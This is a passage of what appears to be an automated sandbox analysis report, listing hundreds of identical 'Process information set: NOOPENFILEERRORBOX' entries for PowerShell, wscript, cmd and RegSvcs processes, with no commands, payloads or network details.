              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
